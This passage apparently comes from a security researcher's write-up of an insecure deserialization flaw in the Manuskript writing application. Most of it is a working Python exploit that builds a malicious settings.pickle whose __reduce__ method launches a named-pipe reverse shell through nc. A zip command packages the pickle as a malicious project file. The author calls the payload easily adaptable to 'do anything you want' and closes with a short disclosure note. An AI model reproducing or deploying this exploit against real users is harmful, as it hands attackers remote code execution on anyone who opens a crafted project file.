Now, onto the exploit. There are many references to insecure deserialization online, so google them if you aren’t familiar, but here is the code I used on Ubuntu 20.04 to generate a reverse shell to localhost port 1234. This payload can easily be modified to do anything you want on Linux, Mac, and/or Windows. When this code is run, it outputs a malicious settings.pickle file, which we will include in the project.

#!/usr/bin/env python3

import pickle
import os


class EvilPickle(object):
    def __reduce__(self):
        cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f')
        return os.system, (cmd,)


pickle_data = pickle.dumps(EvilPickle())
with open("settings.pickle", "wb") as file:
    file.write(pickle_data)

After the settings.pickle file is output, simply zip it up:

zip malicious-project.zip settings.pickle

And now you have a malicious-project.zip file that you simply load into Manuskript.

I notified the people involved, and they don’t currently intend to fix this issue. They are refactoring the project, and the deserialization code may be removed altogether.